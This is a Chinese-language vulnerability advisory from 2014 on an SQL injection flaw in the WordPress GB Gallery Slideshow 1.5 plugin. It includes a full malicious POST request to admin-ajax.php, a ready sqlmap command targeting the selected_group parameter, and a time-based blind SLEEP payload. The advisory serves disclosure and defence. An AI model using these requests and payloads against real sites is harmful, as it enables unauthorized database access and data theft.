WordPress GB Gallery Slideshow插件'wp-admin/admin-ajax.php' SQL注入漏洞
发布日期:2014-08-11
更新日期:2014-08-13
受影响系统:WordPress GB Gallery Slideshow 1.5
描述:
BUGTRAQ ID:
69181
GB WordPress Gallery Slideshow是基于Ajax及jquery的插件,可创建自定义特效的幻灯片。
GB Gallery Slideshow 1.5及其他版本没有有效过滤用户数据,攻击者可利用此漏洞执行未授权数据库操作。
<*来源:Claudio Viviani
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-5b2ded0 (
http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.67
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 120
Connection: close
action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]
Exploit via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "
http://www.example.com/wp-admin/admin-ajax.php" \
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql
---
Place: POST
Parameter: selected_group
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/浏览次数:4288
严重程度:0(网友投票)
